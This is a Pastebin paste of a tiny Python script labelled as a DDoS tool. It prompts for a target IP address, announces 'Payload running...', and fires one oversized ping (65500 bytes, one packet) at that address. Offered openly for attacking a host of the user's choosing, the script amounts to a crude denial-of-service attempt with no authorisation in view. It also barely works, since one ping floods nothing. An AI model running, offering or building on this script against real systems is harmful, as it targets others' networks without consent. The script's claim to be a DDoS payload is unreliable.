Adm1n_0v3rride

ddos python3.py

Jan 22nd, 2018
555
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.25 KB | None | 0 0
  1. #!/usr/bin/env python3
  2.  
  3. import subprocess
  4.  
  5. target = input("Please input the ip address you want to DDOS: ")
  6.    
  7. print("Payload running...")
  8.    
  9. DDOS = subprocess.run(['ping',target,'-l','65500','-w','1','-n','1'])
  10. print('returncode:', DDOS.returncode)
Advertisement
Add Comment
Please, Sign In to add comment